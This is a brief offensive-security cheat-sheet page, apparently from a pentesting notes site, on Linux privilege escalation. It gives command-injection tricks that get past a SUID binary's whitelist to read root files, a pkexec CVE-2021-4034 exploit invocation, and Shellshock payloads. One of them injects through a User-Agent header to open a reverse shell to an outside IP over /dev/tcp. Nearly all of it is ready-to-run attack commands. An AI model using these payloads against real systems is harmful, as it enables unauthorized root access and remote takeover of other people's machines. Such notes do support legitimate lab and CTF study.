Binary Exploitation - Linux

Bypass SUID whitelist

  • Sometimes SUID commands may have a whitelist for commands .

  • This can be bypassed by using subcommands:

supershell ‘/bin/ls $(cat /root/root.txt)

  • In this example supershell is the SUID binary and /bin/ls the whitelisted command, there are also another way to bypass this by using ' to open a quote:

supershell ‘/bin/ls

  • Then in the next line use your desired command:

cat /root/root.txt’

Exploit pkexec

  • Check if pkexec has SUID permissions:

ls -l /usr/bin/pkexec
python CVE-2021-4034.py

ShellSock

  • Attack vectors include remote command execution via CGI scripts or web servers, as well as exploitation in environments like SSH, HTTP, and any process that involves Bash interpreting environment variables.

  • Affects Bash versions 1.x to 4.3:

() { :;}; echo; /usr/bin/id

  • Inject malicious code through the User-Agent header, targeting a vulnerable CGI script in the /cgi-bin/ directory to initiate a reverse shell:

wget -U '() { :;}; echo; /bin/bash >& /dev/tcp/172.24.0.253/4443 0>&1' -O- http://172.24.0.2/cgi-bin/stats

PreviousJailbreaksNextKernel Exploits

Last updated